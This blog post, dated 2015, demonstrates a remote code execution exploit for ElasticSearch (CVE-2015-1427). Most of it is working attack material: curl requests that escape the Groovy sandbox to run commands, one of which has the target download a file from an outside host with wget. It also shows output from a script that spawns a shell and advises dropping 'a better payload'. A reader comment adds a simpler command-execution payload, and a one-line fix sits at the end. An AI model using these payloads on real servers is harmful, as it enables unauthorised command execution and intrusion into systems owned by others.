Wednesday, March 11, 2015

ElasticSearch CVE-2015-1427 RCE Exploit


References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048

Since the exploit is  already out here [XiphosResearch github] and here [in a comment :-) ] and here [Metasploit pull request]

POC's

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'

$ cat /tmp/testy
It worked :-)

---

python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$

To fix disable groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+


script.groovy.sandbox.enabled: false

1 comment:

  1. Thx to groovy script enabled by default on recent version, it's more easier to execute:
    ...
    "script_fields": {
    "result": {
    "script" : "['ls','/'].execute().text",
    "lang": "groovy"
    }
    }
    ....

    Specify "lang" parameter makes this exploit works on any version (old version use mvel by default)

    ReplyDelete